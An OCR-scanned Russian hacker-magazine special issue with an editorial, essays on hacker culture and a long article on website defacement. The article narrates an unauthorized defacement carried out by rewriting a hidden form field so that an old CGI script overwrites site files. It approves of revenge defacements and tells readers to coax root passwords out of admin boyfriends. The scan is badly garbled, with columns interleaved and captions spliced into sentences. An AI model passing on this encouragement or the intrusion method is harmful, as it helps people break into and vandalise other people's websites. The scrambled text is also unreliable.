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Зима двинула кони. То есть, пока 
ещё не двинула, но уже почти. О 
чем это говорит? Правильно. Весна 
на носу. А мы, совершенно обалдев 
от перепадов забортных темпера- 


тур и физических нагрузок, сдаем ти: м 
сегодня этот спецвыпуск. Ты не факс: (095) 924.96.94 


представляешь себе, сколько нам 
всего пришлось сломать! Пару бу- 
таритарских таксофонов, пяток бу- 
таритарских домофонов, пяток 
почтовых ящиков, две мышки, трех 
собак и одну бабушку. Зато вот, 
пожалуйста - результат наших дол- 
гих трудов, первый спец нового ве- 
ка - Vzlom. Ты можешь узнать MHO- 
гое о том, как работают разные (и 
не только компьютерные) системы 
безопасности. А главное - ты смо- 
жешь понять, нужно ли это тебе. 
Ведь любой взлом - сам пони- 
маешь, работа небезопасная, нуд- 
ная и тяжелая, временами приво- 
дящая к тяжелым травмам, или да- 
же к смерти. Я не шучу! Впрочем, 
сам всё понимаешь, не маленький. 


Так что, читай, изучай, познавай. И 
учти: хак - это не нюканье прияте- 
лей в чате, и не затроянивание 
подружек. Хак - это поиск ответов 
на твои вопросы, о чем бы они не 
были. 


Удачи. 
Холод 
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Что такое 
Киберпанк? Какое 
отношение он имеет 
к хакерам? 
Специально для тебя 
мы устраиваем 
небольшой экскурс 
в историю! 


| Хак - это круто, хак - это 
клево... а ты когда-нибудь 
задумывался о том, что за 
взломом могут стоять 

жизни живых людей? 

причем, как по одну, так и 

по другую стороны 
баррикад... 


Хак-группы - откуда 
они беругся? Как 
создать свою хак- 
группу? А как вступить 
в чужую? Что нужно 
знать, чему нужно 
учиться? Хакерами не 
рождаются - ими 
становятся! Читай наш 
спец-репортаж о хак- 
группах. 
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ОРГАНИЗАЦИЯМ НА ИХ ОШИБКИ В СИСТЕМАХ БЕЗОПАСНОСТИ. 
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Удели мне сегодня немного внимания. Скажи, если по- 
падаешь под такие определения. Ты снова заполучил 
очередной нет-экаунт. Ты серфишь инет, и постоянно 
смеешься под репортажами в журналах и газетах о ин- 
формационной свободе. У тебя есть red box, и за теле- 
фонные звонки ты не платишь. У тебя есть crackerjack, и 
ты легко ломаешь никсовые пароли. Все поражены твои- 
ми знаниями о компьютерах, даже учителя информатики 
в школе частенько просят тебя о помощи. Что, точь-точь 
как о тебе написано? Ты не хакер. 


Таких как ты - тысячи. Ты читаешь “2600”, и задаешь 
вопросы. Ты приходишь на канал #hack, и задаешь воп- 
росы. Ты задаешь все эти вопросы, и в конце концов 
спрашиваешь - что не так? В конце концов, хак - это от- 


веты на вопросы, разве нет? Но тебе не нужны знания. Ты 
хочешь просто получить ответы на вопросы. 


Ты не хочешь понять, как что-то работает. Ты просто хо- 
чешь ответы. Ты не хочешь исследовать. Всё, что ты хо- 
чешь знать - ответы на твои чертовы вопросы. Ты He Xa- 

кер. 


Хак - это не ответы. Хак - это путь, который тебе прихо- 
дится проделать, чтобы найти ответы. Если тебе нужна 
помощь - не спрашивай об ответах - спроси лучше о том, 
где ты сам мог бы их найти. Потому, что хакеры - это не 
люди, обладающие ответами, или дающие ответы на 
вопросы. Хакеры - люди, которые путешествуют по дол- 
гому пути в поисках собственных ответов. 


[ЕТ Done Be oa 
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эвопючция 


NOAH (NOAH@INBOX.RU, UIN 983332) 


ХАК ПОД МИКРОСКОПОМ рой, - вообще неоспоримый факт! Да, и не по- 
думай, пожалуйста, что под словом “моло- 
дежь” я подразумеваю ребят не старше че- 

тырнадцати лет! До тридцати, как 
минимум! Прав- 
да, чем даль- 
ше, тем мо- 


Да-а, интересная y хака история :). Рассмотрим 
кое-какие ее подробности, ок? 

Ты заметил, что на протяжении почти все- 
го времени рядом с хацкерством была 
молодежь? Я, конечно, не хочу 


сказать, что взрослых хакеров не ложе люди, 
бывает. Бывают,причем очень интере- 
много и самые лучшие, но они, сую - 


опять же, были хакерами и в моло- 
дости. Это повзрослевшие моло- 
дые хацкеры. Я, во всяком случае, 
ни разу не слышал, чтобы какой- 
то компьютерный специалист 
заинтересовался и начал зани- 
маться хакингом уже в зрелом воз- 
расте :). А то, что хацкерская 
культура является на 

сегодняшний день 
молодежной 

культу- 


щие- 
ся 


Перец, мы с тобой мо- 
жем даже не беспо- 
коиться - пока инфор- 
мационные технологии 
претерпевают столь 
сильный бум, крышка 
хаку точно не настанет! 


ХАКА 
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хаком. Может быть оттого, что с каждым по- 
колением человечество становится все умнее 
+)? Будет прикольно, если лет через двадцать 
хакать начнут с семилетнего возраста :). 
В народе бытует мнение, что хак - гиблое де- 
ло. Помнишь, я говорил, что фрикинг в одно 
время чуть не откинул копыта по причине то- 
го, что телефонные компании научились гра- 
мотно и безглючно настраивать свою аппара- 
туру, позатыкали все широко известные фри- 
керские дыры, заточили меры безопасности - 
короче, подняли уровень своей защиты до та- 
кой планки, что отдельно взятому человеку 
фрикать стало очень сложно. Так вот, некото- 
рые люди считают, что хаку уготовлена такая 
же участь. Что скоро меры по борьбе с хакер- 
ством будут усилены, что админы с каждым 
днем становятся все грамотнее, что их систе- 
мы становятся более устойчивыми и, что, в 
конце концов, тому же отдельно взятому че- 
ловеку заниматься хацкерством будет просто 
невыгодно - зачем подвергать свою свободу 
опасности, если можно с теми же знаниями и 
умениями зашибать неплохие деньги на ле- 
гальной работе. Я с такой точкой зрения ка- 
тегорически не согласен. Знаешь, почему те- 
лефонщикам удалось так круто уладить все 
свои проблемы с безопасностью? Потому что 
в один прекрасный момент телефонные тех- 
нологии перестали развиваться. Просто не 
было нужды их развивать - людям не нужна 
более совершенная телефонная связь - та, 
что есть, уже полностью удовлетворяет их 


г. потребности. У телефонных компаний 
< 


появилось много свободного времени и 
много свободных ресурсов, чего вполне дос- 
таточно, чтобы подтянуть все фронты и по- 
закрывать уже существующие дыры. А так 
как нововведений в телефонной сфере не 
появлялось, неоткуда было взяться новым 
дырам. Вот и возникла такая стремная для 
фрикинга ситуация. К счастью, через некото- 
рое время люди решили, что совсем не поме- 
шало бы иметь возможность таскать телефо- 
ны с собой повсюду: появилось крупное но- 
вовведение - сотовая связь. Это нововведе- 
ние принесло с собой кучу новых дыр и ог- 
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Короче говоря, ты не парься, не слушай всяких ум- 
ников и юзай на здоровье и эксплоиты, и всякий 
другой софт, какой посчитаешь нужным. Главное, 
чтобы ты понимал, что ты делаешь. Есть ведь и та- 
кие перцы, которые не то что не знают, как реали- 
зован тот или иной эксплоит, а даже не представ- 
ляют себе, что он, собственно, такое, но пытаются- 


ИЗ ИСТОРИИ 


таки хакнуть ;). 


ромное пространство для фрикерской дея- 
тельности :). 

Сотовая связь развивается - старые дыры 
закрываются, новые появляются, обнаружи- 
ваются фрикерами, вовсю юзаются и стано- 
вятся старыми ;). Короче, процесс идет :). 
Спрашивается, как такой затык может прои- 
зойти с хаком, если в области информацион- 
ных технологий наблюдается постоянный 
прогресс, постоянное развитие? Причем этот 
прогресс движется семимильными шагами, 
новые технологии появляются чуть ли не в 
геометрической прогрессии!!! Перец, мы сто- 
бой можем даже не беспокоиться по этому 
пустому поводу - пока информационные тех- 
нологии претерпевают столь сильный бум, 
крышка хаку точно не настанет! 


ХАК ОПОПСЕЛ?! 


Перец, спорим на щелбан, что ты не раз слы- 
шал, как какой-нибудь умник распростра- 
няется с видом крупнейшего специалиста в 
области хакинга о том, что хак опопсел, что 
теперь он уже совсем не тот, что раньше ха- 
керы были грамотнее, что они сидели и своей 
головой искали дыры в системах, а не поль- 
зовались чужими эксплоитами и другим соф- 
том, как это делают сейчас, и прочее подоб- 
ное в том же духе (много!). Знаешь, я не бу- 
ду говорить, что они ослы и что они просто 
понтуются, строят из себя крутых. Я просто 
хочу, чтобы ты все понимал правильно. 


А то, что хацкерская 
культура является на 
сегодняшний день 
молодежной культу- 
рой, - вообще неос- 
поримый факт! 


Вот смотри. Действительно, пару десятков лет 
назад среднестатистический хакер был нас- 
только крут, что сам находил дыры в систе- 
мах, которые хотел взломать, и сам же, руч- 
ками, эту систему взламывал. Ок, я и с тем 
согласен, что сейчас среднестатистический 
хакер юзает много чужого софта, не зная тон- 
костей его исполнения, знает лишь, что и где 
надо сделать, чтобы то-то произошло. А те- 


перь давай посмотрим, как изменилось с тех 
пор программирование. Понял, куда я клоню 
;)? Раньше программеры писали весь свой 
софт сами, от начала и до конца. А что они 
делают сейчас? Сидят в визуальных сре- 

дах и на полную катушку юзают напи- 
санные черт знает кем компоненты. 

И они не знают, как именно напи- 
сан этот компонент, они не 
знают тонкостей его испол- 
нения, все, что они знают, - 
это как и где его можно ис- 
пользовать и что в резуль- 
тате получится. Между 
прочим, такой подход ле- 
жит в основе принципа ин- 
капсуляции, который яв- 
ляется одним из основных 
в объектно-ориентирован- 
ном программировании, 
которое, в свою очередь, 
считается самой передовой 
технологией программирова- 

ния на сегодняшний день. Лад- 

но, теперь давай взглянем на 60- 

лее близкую к хакингу область - на 
администриро вание и построение 
систем безопасности. Где ты сейчас 
найдешь админа, который не пользуется 
дистрибутивами? А ведь дистрибутив - это 
уже подобранный и настроенный софт - 
прямая обязанность админа в недале- 
ком прошлом. Кроме того, админы 
юзают кучи софта, не зная, как на- 
писан этот софт, зная только, как 

его правильно настроить. Еще 
больше многие админы строят 
свои системы защиты по уже гото- 
вым образцам построенных другими 
админами систем. 

И что же это такое получается? Хацкеры уже 
неграмотные, прогеры - неграмотные, адми- 
ны - неграмотные? Значит хакинг опопсел, 
программирование опопсело, админская дея- 
тельность опопсела? Я бы не стал называть 
это опопсением, это просто такой масштаб- 
ный процесс, в ходе которого последующие 
поколения используют в своей работе опыт 
предыдущих. Чувак, это принцип всей нашей 
человеческой цивилизации! Короче говоря, 
ты не парься, не слушай всяких умников и 


юзай на здоровье и эксплоиты, и всякий дру- 
гой софт, какой посчитаешь нужным. Глав- 
ное, чтобы ты понимал, что ты делаешь. Есть 
ведь и такие перцы, которые не то что не 
знают, как реализован тот или иной эксплоит, 
а даже не представляют себе, что он, соб- 
ственно, такое, но пытаются-таки хакнуть ;). 


З.Ы. 


Ну как? Чувствуешь шевеление кусков паззла 
в мозгах? Хе-хе, надеюсь на это :). Ладно, 
бывай, продолжай шевелить своими паззлами 
:), а я пойду шевелить своими. 

Пока! fi 
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DEFACE: 


TPAGUUUU КРАСНОКОЖИХ 
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NOAH (NOAH@INBOX.RU, UIN 983332) 


Как оказалось, смотреть хакнутые версии сайтов детали :). 

тоже бывает интересно, особенно когда там напи- Суть дефейса такова: висела в инете симпа- 
[13 

сано не просто “hacked by Vasya”, а что-то толко- тичная страничка, на которой опытные жи- 


вое, плюс еще какая-нибудь картинка, подходя- 
щая по смыслу, аеще лучше - флэш. Вотяи ре- 
шил написать статью о самых красивых взломах 
известных мне сайтов. Сразу хочу объявить благо- 


вотноводы делились с неопытными животно- 
водами своим, собственно, опытом о том, как 
правильно кормить самца северно-американ- 


дарность www.hackzone.ru/hacked и лично Дмит- КОГО: ОВО В ВЕСЕННЕ ЛЕТНИЙ СЕЗОН 
puto Леонову ;-). Сразу хочу извиниться, что пи- а per nee Ho в a cecal 
сать здесь я (6 ду мало, так как больше внимания расный день эту страничку посетил злой хац- 
буду уделять цитатам и скринам :). кер Vasya Pupkin, обладатель грозного ника 


MegaDarkSuperHacker. И уж не знаю, чем ему 
там не приглянулись северно-американские 
евушка в салоне  барсуки, но сайт он этот хакнул, и теперь все 
: fal тату и пирсинга: = юные натуралисты, заглядывающие туда, ви- 
“Ой, здравствуй- AAT не привычное “Добро пожаловать на стра- 
те! Сделайте мне дефейс, ничку северно-американских животново- 
пожалуйста, только такой, дов!” а  пупкинское “Hacked Бу 

чтоб больше ни у кого не  МедаОагкбирегНасКег". 
было". Работник салона — Дефейс - это взлом, в ходе которого хакер по- 
немного удивился но  лучает доступ к файлу index.html (или 
предложил ей покамест  default.html) в директории html меб-сервера 
присесть в кресло: мол, не и изменяет его содержимое. Получить доступ, 
волнуйтесь, сейчас pa36e- — в данном случае, означает получить право Ha 
ремся и все сделаем. Что — запись в этот файл и средство для записи. В 
там произошло дальше, я зависимости от ситуации, средством для за- 
не узнал, так как мы C писи может оказаться все что угодно: обыч- 
друзьями не хотели оби- ный Кр-клиент, любой текстовый редактор, 
деть девушку (она была — запущенный с telnet, дырявая ССГшка, зава- 
довольно симпатичная!) — лявшаяся на ломаемом серваке, и черт знает 

и, зажимая рты, выско- — что еще. 
чили похохотать на 


улицу. ЧТО МОЖЕТ СДЕЛАТЬ 
ОДИН МАЛЕНЬКИИ, НО 
СДЕЛАЮ ЧЕРТОВСКИ КРИВОИ 
ПЛАСТИЧЕС- СКРИПТ 
КУЮ ОПЕРА- 
ЦИЮ ВАШЕМУ Однажды мне срочно понадобилось сделать 
САЙТУ. БЫСТРО. дефейс некоему сайту с веселыми картинка- 
НЕДОРОГО. ми (почему, объясню в самом конце). Сайт 


был весьма качественный. Все грамотно сде- 

Итак, дружище, дефейс. Давай nano, аккуратно - не к чему придраться. За- 
сначала немного поговорим, ска-  регался я пару раз для пробы (с левых кред) 
жем так, о технической стороне и полез смотреть на форму, отсылающую ин- 
дефейса ;), а уж потом, когда все фу о регистрации. Черт побери, и здесь все 
мы хорошенько прогрузимся, обсу- — гладко! Я уже собирался покинуть этот пога- 
AMM еще кое-какие интересные ис- ный сайт, как мой взгляд упал на ссылочку, 
торические и морально-этические  гласящую “old version”. Надежда возобнови- 
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brightonbeachave.com 


Хакнул страницу господин Mist из NitrOgear Group 
(www.nitrogear.org) - кстати, на их сайт ОЧЕНЬ ре- 
комендую зайти (не пугайся, там все на русском 
:)). А вообще, Mist много чего перехакал, и все его 
“работы” выполнены достаточно аккуратно. 


hacked by mist [nitrlgear| 


privet from Russia :-) 


лась! Старая версия сайта хранилась в папке 
/old. Когда я полез в тамошние исходники, я 
офигел. В противоположность новой, старая 
версия сайта была сделана абсолютно негра- 
мотными людьми. Представь себе, что вся ин- 
формация о новом юзере записывалась не в 
нормальную базу данных, а в отдельный 
файл типа /old/db/<uma файла>, коих в этой 
директории наблюдалась целая куча. Все 
данные хранились в текстовом виде, а разде- 
лителем служил обычный перевод строки. А 


самый блеск в том, что имя файла и путь к не- 
му генерировались в JavaScript по какому-то 
там вшивому алгоритму, как производное от 
логина и мыла юзера, и передавались CGI- 
скрипту вместе с данными из формы в виде 
поля типа hidden. Изменив чуть-чуть хтмл'ку, 
я практически получил возможность созда- 
вать на сервере файлы с любым содержа- 
нием, а это, в свою очередь, означает, что по- 
рутить сервак не составит никакого труда (а 
где рут, там и дефейс). Но здесь меня ждал 


action 


облом - оказалось, что этот чертов скрипт не 
имеет полномочий создавать файлы в дирек- 
ториях выше /html (хорошо, что хоть об этом 
позаботились). Ну и фиг с ним - порутить 
нельзя, зато можно сделать отличный дефейс 
:). Я потом тебе объясню, почему мне не нуж- 
но было менять index.html, а нужно было 
просто изменить пару других html-dainos в 
директории \меБ-сервера. Короче говоря, я 
создал небольшую форму, обращающуюся к 
их скрипту, в none hidden вписал путь и имя к 
первому файлу из тех, которые хотел изме- 
нить, в полях данных о юзере вписал (пред- 
варительно убрав лимит по длине) немного 
видоизмененный И{т!-код исходного файла, 
нажал кнопарь “Post” и повторил эту опера- 
цию для всех файлов. В результате, загрузив- 
шись из браузера, я увидел, что все измене- 
ния в тех файлах вступили в силу :). А стои- 
ло админу удалить вовремя старую версию 
сайта, и ни фига бы я там так легко не полу- 
чил. 

Заметь, что я получил доступ к файлу 
index.html (хоть я и не менял его, а менял ос- 
тальные файлы, а если бы хотел сделать 
классический дефейс, поменял бы его): пра- 
во на запись в него имел тот злополучный 
скрипт, средством для записи послужил опять 
же он. Hy, о том, как сделать дефейс no ftp, 
имея пароль к ftp-cepBepy, и no telnet, имея 
пароль более или менее привилегированного 
юзера, я надеюсь, ты знаешь. 


Дефейсы можно делить на категории по мно- 
гим признакам: по способу, которым был сде- 
лан дефейс, по причинам, из-за которых он 
был сделан, по последствиям, к которым он 
привел, и т.д. Но есть одно очень важное об- 


action 


стоятельство, которое четко разделяет все 
дефейсы ровно на две части: громкие дефей- 
сы и негромкие дефейсы. Обстоятельство это 
складывается из двух показателей: степени 
известности сайта, которому был сделан де- 
фейс, и степени огласки, которую получил 
факт дефейса. Если ты сделаешь дефейс сай- 
ту http://www.unknownsubdomain.unknowndo- 
main.net/~unknownsite, который имеет три 
посещения в неделю, два из которых прихо- 
дят по ссылке с порносайта, а один забредает 
случайно, и если даже твой дефейс там будет 
висеть целый месяц, то он все равно будет 
ярким представителем негромких дефейсов. 
Объяснять почему не надо? Отлично. Проти- 
воположный случай. Если ты в 5:30 утра в 
субботу сделаешь дефейс microsoft.com, а в 
5:32 того же дня его уберут на фиг, то это бу- 
дет тоже негромкий дефейс. И лишь в том 
случае, если ты дефейснишь какой-нибудь 
хорошо раскрученный сайтище, и твой де- 
фейс повисит там достаточное количество 


formulat.ru 
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Что же такое дефейс? Проявление вандализма? А 
может, дефейс помогает отдельным извращен- 
ным личностям самоудовлетвориться (мораль- 
но!!! ), почувствовать уверенность в себе? Дефейс 
- способ выказывания протеста против чего-то? 
Дефейс - месть организации, чей сайт был дефей- 
снут? Или дефейс - плевок в сторону админа сер- 
вака? Может, кто-то делает дефейс ради прикола? 
Или все-таки дефейс может принести кому-то ка- 


кую-то пользу? 


керюга. Причем, может оказаться, что на од- 
ном сервере ламер смог сделать дефейс, а на 
другом опытный хацкер ничего не добился. 
Сколько серверов в инете, столько и способов 
сделать дефейс. Иногда для того, чтобы сде- 
лать 

дефейс, приходится порутить сервак, а иног- 
да и целую сеть, передвигаясь от одного ком- 
па к другому по цепочке, раскручивая каж- 
дый на рута, пока не будет достигнут тот са- 


Никакой графики и интересного текста тут тоже 
нет, но зато мне идея понравилась. Здесь хакер 
Cyrus просто признался в любви своей подруге 
(Милана, классный у тебя парень ;-). 


времени, чтобы попасть на первые полосы 


крупных сетевых, а еще лучше печатных из- 
даний, только тогда твой дефейс удостоится 
высокого звания ГРОМКОГО ДЕФЕЙСА. 

Ок, мы выяснили, что дефейс - это достаточ- 
но обширный в своих проявлениях хак. В за- 
висимости от обстоятельств, сделать дефейс 
может как полный ламер, так и опытный ха- 


мый комп. А иногда маленькая дырочка, поз- 
воляющая дефейснуть сервер, лежит прямо 
на поверхности, и буквально в течение пят- 
надцати минут удается заметить ее и пою- 
зать. Попадаются и такие случаи, когда эту 
самую маленькую дырочку приходится искать 
в течение месяца, облазив весь сервер и изу- 
чив каждый поганый кусок чужого кода. 


Теперь, когда мы разобрались с вопросом 
“как?”, давай обсудим вопрос “почему?” По- 
чему люди делают дефейс? На первый взгляд, 
OT этого никто никакой пользы не получает. 
Что же такое дефейс? Проявление вандализ- 
ма? А может дефейс помогает отдельным из- 
вращенным личностям самоудовлетвориться 
(морально!!), почувствовать уверенность в 
себе? Дефейс - способ выказывания протеста 
против чего-то? Дефейс - месть организации, 
чей сайт был дефейснут? Или дефейс - пле- 
вок в сторону админа сервака? Может кто-то 
делает дефейс ради прикола? Или все-таки 
дефейс может принести кому-то какую-то 
пользу? Как видишь, разных версий достаточ- 
но много, и как мы скоро увидим, все они от- 
части верны. 


М-да, вандализм. Вандализм в сети ничем не 
отличается от вандализма в реале. Ну, нра- 
вится некоторым людям созерцать результаты 
своих разрушений. И ничего с этим не поде- 
лаешь - психология, она и в Африке остается 
психологией. Чаще всего, как и в реале, ван- 
дализмом в сети занимаются еще не оформив- 
шиеся, буйные подростки. Я так и вижу моло- 
дого парнишку, который сидит на собствен- 
ных ладонях (чтобы не 

сломать что-нибудь от волнения) и с нетер- 
пением смотрит на экран монитора, где заг- 
ружается сайт, который он только что де- 
фейснул. Щеки красные. Рядом лежит теле- 
фон, в который он через пару секунд будет 
орать: “Епрст, Витек, загрузись BOT по это- 
му адресу! Быстрее!". К счастью, такие pe- 
бята не бывают достаточно грамотными, 
чтобы сделать реально громкие дефейсы. 
Да и само оформление дефейса выглядит 
весьма погано оттого, что они еще недоста- 
точно хорошо знают хтмл и фотошоп, чтобы 
наверстать красивый дефейс. Лично я про- 
тив таких ребят ничего не имею - во-пер- 
вых, почти все с этого начинают, и, вообще, 
- это процесс, описанный в физиологии дет- 
ского организма как переходный период, 
это нормально. Во-вторых, они, по сути, не 
наносят почти никакого вреда. Короче, 
“чем бы дитя не тешилось..." 
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ШИЗО-ДЕФЕЙС 


Далее по очереди у нас идут чудаки, неудач- 
ники и откровенные психопаты. Эти люди 
обычно бывают морально травмированы (или 
мне так кажется) и делают дефейс, чтобы по- 
чувствовать уверенность в себе, в своих си- 
лах. Например, выгнали чела с работы за про- 
фессиональную непригодность (ленивый, нег- 
рамотный), а он с облому делает дефейсы, 
чтобы доказать себе и всем остальным, что он 
не такой уж непрофессиональный. Или же не- 
которые чудаки делают дефейс просто от без- 
делья, чтоб не потерять хацкерскую форму. 
Иногда дефейс делают от зависти к дизайну 
сайта. В принципе, среди таких дефейсов не 
попадаются очень громкие, но чем черт не 
шутит! Оформлены они бывают как угодно. 
Нельзя и сказать что-то конкретное о грамот- 
ности хакера. 


FREE NATO!!! KEVIN, ГО 
XOM!!! 


action 


И уж не знаю, чем ему там He приглянулись CeBep- 
но-американские барсуки, но сайт он этот хакнул, 
и теперь все юные натуралисты, заглядывающие 
туда, видят не привычное “Добро пожаловать на 
страничку северно-американских животноводов!?’, 
а пупкинское “Hacked Бу MegaDarkSuperHacker”. 


Вот тебе два ярких примера дефейсов, кото- 
рые были сделаны для того, чтобы высказать 
протест общественности против тех или иных 
действий определенной группы людей. Поче- 
му эти примеры яркие? Да потому, что они 
приняли массовый характер, под этими лозун- 
гами были сделаны не два и не три дефейса, 
а целые десятки. Причем, делали их разные 
люди в разных концах нашего голубого шари- 
ка. Я уверен, что хотя бы раз в месяц где-ни- 
будь в сети делается дефейс, в котором сту- 
дент жалуется на то, что препод поставил ему 
плохую оценку. Но об этом никто не знает, так 
как недовольство проявляет всего лишь один 
студент. А в случаях с арестом Митника и вве- 


Shalom, jerks! 
Go te study АВС instead of intifada. 


дением войск NATO в Югославию недовольных 
было очень много. Вот и нашлись люди, кото- 
рые начали дефейсить и выкладывать в своих 
дефейсах 

требования и угрозы в случае их невыполне- 
ния. Логично, что жертвами таких дефейсов 
становятся сайты организаций, которые выз- 
вали недовольство. Авторами этих дефейсов 
бывают довольно грамотные хацкеры (одно 
дело найти какой-нибудь сайт, которому мож- 
но сделать дефейс, и совсем другое - найти 
возможность сделать дефейс конкретному 
сайту). Обычно такими акциями протеста за- 
нимаются хакеры-романтики, которые верят в 
то, что вся информация должна быть доступ- 
ной и что их действия могут оказать реальное 
влияние на политику и т.д. Дефейсы в рамках 
таких акций часто бывают очень громкими. И 
выглядят они довольно хорошо, часто как 
прикольные графические шаржи на “плохих 
ребят” либо как весьма серьезно оформлен- 
ные манифесты и лозунги. 

Иногда, когда эти акции обретают особо круп- 
ные масштабы, к ним примыкают и прочие 
падкие до дефейса люди: те же “подгузники”, 
морально обиженные и прочие. Тогда валятся 
не только сайты, владельцы которых завари- 
ли эту заварушку, но и все остальные, не 
имеющие с ними ничего общего, просто по- 


Я так и вижу молодого 
парнишку, который си- 
дит на собственных ла- 
донях (чтобы не сло- 
мать что-нибудь от 
волнения) и с нетерпе- 
нием смотрит на экран 
монитора, где загру- 
жается сайт, который 
он только что дефей- 
снул. Щеки красные. 
Рядом лежит телефон, 
в который он через па- 
py секунд будет орать: 
“Блин, Витек, загру- 
зись вот по этому ад- 
ресу! Быстрее!?”. 


павшиеся под руку. Это опять же в силу того, 
что не всякому под силу сделать дефейс кон- 
кретному сайту. На мой взгляд, это - уродство. 
Ну зачем писать на страничках индокитайско- 


action 


го филиала португальской торговой фирмы о 
том, что НАТО - дерьмо? Нет, понятно, что эту 
надпись увидит определенное количество лю- 
дей, но это опять же проявление вандализма 
и собственной ограниченности. 


usanet.com 


Знаешь, что такое вендетта? Это когда в 
средневековой Испании один род клялся вы- 
местить кровью обиды, которые ему нанес 


А иногда меня просто переполняет гордость за 
Россию. Надо же этим буржуям напоминать, в ка- 
кой стране самые лучшие хакеры. С этой целью и 
был взломан этот сайт. На сайте под гимн России 
развивался наш флаг - пусть, в конце концов, весь 
мир знает наш гимн наизусть, пора их приучать :). 


his site was hacked Бу Seru 


Any comments to 


= = 
bad < ——\ „ = 


> 


Начало 5О-ых 


Но долгая работа с компом не может не оставлять своих следов :), и эти самые 
ученые стали потихоньку оформляться в отдельный вид - инженер ЭВМ. Приме- 
чательно и то, что к словосочетанию “вычислительная машина” крепко привя- 
залась приставка “электронно”. Это означает, что механические драндулеты 
окончательно были признаны историей, а будущим вычислительной техники 
официально стало электричество. В принципе, на этом этапе появилось слово 
“компьютерщик”, но оно еще не использовалось повсеместно, так как просто 
некому было его использовать. Ведь “компьютерщик” - это слово, которым лю- 
ди, слабо разбирающиеся в компах, называют людей, разбирающихся в них по- 
лучше. Интерес обывателей к компьютерам был очень слаб, а сами компьютер- 
щики никогда себя так не называют, кстати, и сейчас тоже. Среди инженеров 
ЭВМ начал выделяется особый вид, который большую часть работы проводил 
не с аппаратным обеспечением (hardware - хард), а с программным (software - 
софт), - программисты. Реальными хакерами пока еще и не пахло. 
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Дефейс - это взлом, в 
ходе которого хакер 
получает доступ к фай- 
ny index.html (или 
default.html) в дирек- 
тории html web-cepBe- 
ра и изменяет его со- 
держимое. 


другой род. Обычно это заканчивалось весь- 
ма плачевно ;). Времена меняются, но жела- 
ние отомстить за перенесенные обиды остает- 
ся. Одним из способов мести является де- 
фейс. Допустим, уволили чела из конторы, а 
он, зная дыры в системе защиты, взял да и 
дефейснул сайт своих 

бывших работодателей. Ну, что поделаешь, 
обычная бытовая ситуация. Не надо было 
выгонять злых сотрудников :). В этом случае 
совсем не обязательно, чтобы хакер, осу- 
ществляющий дефейс, был очень уж грамот- 
ным (хотя дефейс и делается конкретному 
сайту). Достаточно того, что он являлся сот- 
рудником конторы и знает систему “изнут- 
ри". Часто бывает, что сам изгнанный недос- 
таточно грамотен, чтобы осуществить де- 
фейс даже со знанием дыр в защите, поэто- 
му он рассказывает об этих дырах какому- 
нибудь своему более опытному другу и про- 
сит того сделать дефейс. Содержанием таких 
дефейсов обычно бывает куча матерных вы- 
ражений в адрес начальства конторы. Выг- 
лядят они как обычное текстовое сообще- 
ние. Громкими в масштабах инета такие де- 
фейсы никогда не бывают (серьезные заве- 
дения не выгоняют важных для себя служа- 
щих со скандалом), но они могут быть гром- 
кими в масштабах этой конкретной конторы. 
То есть весь персонал не меньше недели бу- 
дет перетирать тему о том, как их уволенный 
коллега трахнул начальство :). 

Часто бывают случаи, когда дефейс осущес- 
твляется для того, чтобы насолить админу 
конторы (чтобы шеф ему хорошенько понада- 
вал за безделье, а лучше - вообще выгнал с 
работы). Например, девушка может отомстить 
бросившему ее бойфренду-админу, зная, что 
пароль рута в системе - не иначе как ее имя 
(Девчонки! Выпытывайте пароли у своих ре- 
бят, если они работают где-нибудь админа- 
ми!). Стоит ей попросить своего знакомого- 
хацкера (а если она еще и чуть-чуть симпа- 
тичная, то он ей точно не откажет :)) сделать 
дефейс - и бывший бойфренд вылетит с рабо- 
ты. В остальном этот тип дефейса похож на 
предыдущий. 


Среди серьезных хакеров тоже попадаются 
приколисты. Любители оставить после себя 
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Тем из них, которые имели дыры, были акку- 

ратно вживлены клиентские баннеры. Не на 

Во-первых, дефейс можно сделать на главной страничке, конечно (сразу заметят), 

заказ :). Тогда мотив заказчика, HO народу оттуда текло немало :). Если ты бы- 

вероятно, окажется схожим с  ваешь Ha такого типа сайтах, то должен знать, 

= одним из вышеперечислен- что в самом низу каждой странички, обычно, 

ных. Во-вторых, де- ошивается около десятка мелких баннеров. 

фейс можно сде- Туда и был впихнут левый баннер. В среднем 

лать с баннеры продержались не более месяца (раз 

целью в месяц на таких сайтах проводят переучет 

несан- всех баннеров, чтобы выяснить, кто им запла- 

кциони- TUN, а кто кинул), но за это время, вкупе с 

рованно- другими рекламными мерами, раскрутка 

го внедре- клиентского сайта уже была достигнута. О 

ния своего том, как был дефейснут один из этих сайтов, 

баннера на я тебе уже подробно рассказал выше. 

чужие стра- 
НИЧКИ. На 
моей памяти 

имеется совер- A знаешь, кто придумал дефейс? Угадай. Не- 

шенно реальный а, не Кевин Митник. И не Билл Гейтс. Амери- 

случай, когда  канские индейцы :). Именно эти угарные пер- 

нужно было рас- цы ежедневно разукрашивали себе лица. При- 

крутить сайт с ве- чем, по разному для разных обстоятельств: 

| селыми картинками. боевая окраска, курительная окраска, любов- 

i. Тогда были выбраны ная окраска :). Теперь их традиции перешли к 


\ несколько не шибко нам, но мы не себя разукрашиваем, а сайты в 
крутых (их легче ло- инете - правильно, мы же киберпоколение! 
HO 


мать, да и следят за 

ними не очень тщатель- Лови TOMaraBK, перчило! Пока, 
), но уже раскрученных 
сайтов с таким же содержанием. 


1 


zemfira.ru 


Чего-то мне слов не хватает - вроде очень краси- 

во, но сказать просто нечего, сам видишь. Хакер 

просто немного подправил индекс, смазав глаза 

Земфире, предварительно наложив матрицу на 
картинку :). 


qndhafafngse 


де - 

фейс. Отру- 

тил сервак, полу- 

чил с него все что хотел и 
в самом конце сделал дефейс. 
Что там будет - зависит от настроения хацке- 
ра-приколиста. Иногда просто картинку пове- 
CAT, иногда вычистят весь сайт и оставят свое 
“Hacked by...”, а еще могут сайт не тронуть, но 
перепутать местами все ссылки :) или еще че- 
го-нибудь в этом роде сотворить. 
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КРАТКАЯ UCTOPUA ХАКА: 
знаменитые персонажи 
u fr DOMKUE COBBIT USI 


ABTOP: MR. FALSE (MR_FALSE@MAIL.RU) 


азумеется, чтобы записать наиболее 
[5 полную историю хака, потребовался 

бы не один журнал. И не два. А уж в 
одну статью все уложить - и подавно. Здесь 
же предоставлен наиболее кастрированный 
материал :). Но зато здесь я поместил, имхо, 
наиболее важные факты из истории. Для 
формирования общего представления, так 
сказать. 


Доисторический период (21 
млрд. лет назад - 1960 г.) 


